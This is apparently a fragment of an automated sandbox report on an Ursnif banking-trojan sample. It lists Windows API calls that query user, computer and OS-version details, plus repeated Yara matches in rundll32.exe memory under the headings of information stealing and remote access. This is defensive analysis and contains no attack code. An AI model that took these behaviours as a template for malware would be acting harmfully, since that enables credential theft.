Code function: 0_2_02BAA199 wsprintfA,GetUserNameW,GetComputerNameW,GetUserNameW,GetComputerNameW,WideCharToMultiByte,

0_2_02BAA199

Contains functionality to query windows version

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1F1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E1F1F0E

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY